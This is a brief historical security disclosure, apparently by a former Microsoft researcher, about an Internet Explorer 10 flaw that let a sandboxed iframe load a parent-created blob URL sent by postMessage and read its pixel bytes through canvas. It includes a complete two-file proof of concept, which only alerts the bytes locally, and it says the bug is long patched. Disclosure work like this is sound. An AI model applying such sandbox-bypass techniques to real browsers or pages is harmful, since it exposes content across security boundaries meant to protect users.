IE10: Blob Image URLs Cross Sandbox Boundaries via postMessage

I found that blob URLs created by the parent page could be sent to a sandboxed iframe via postMessage, and the sandboxed iframe could load them as image sources and even read the pixel data via canvas.getImageData(). Sandboxed iframes should not be able to access blobs created outside their security boundary.

<!-- index.html -->
<iframe src="sandboxed.html" sandbox="allow-scripts ms-allow-popups" width="600" height="70"></iframe>
<script>
function main()
{
    var oXML = new XMLHttpRequest();
    oXML.open("GET", "gif.gif", false);
    oXML.responseType = "blob";
    oXML.send(null);
    var blobURL = window.URL.createObjectURL(oXML.response);
    window[0].postMessage(blobURL,"*");
}
</script>
<input type="button" value="Run PoC" onclick="main()">

<!-- sandboxed.html -->
<script>
function readImageBytes(oImg)
{
    var context = document.all.canvas.getContext("2d");
    context.drawImage(oImg, 0, 0);
    var imgData = context.getImageData(0, 0, oImg.width, oImg.height);
    var bytes = "";
    for (var i=0; i<imgData.data.length; i++)
    {
        bytes += imgData.data[i] + ",";
    }
    alert("These are the bytes from the blob-image:\n\n" + bytes);
}

function fnOnMessage(e)
{
    document.body.innerHTML = e.data + '<br /><img src="'+ e.data +'" /><canvas id="canvas" style="display:none"></canvas>';
    setTimeout("readImageBytes(document.images[0]);", 1000);
}
window.attachEvent("onmessage", fnOnMessage);
</script>

The parent fetched an image into a blob, created a URL, and posted it to the sandboxed iframe. The iframe set it as an image source (which succeeded), then drew the image onto a canvas and extracted raw pixel bytes with getImageData() — demonstrating that the sandbox boundary did not prevent access to parent-created blob content.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.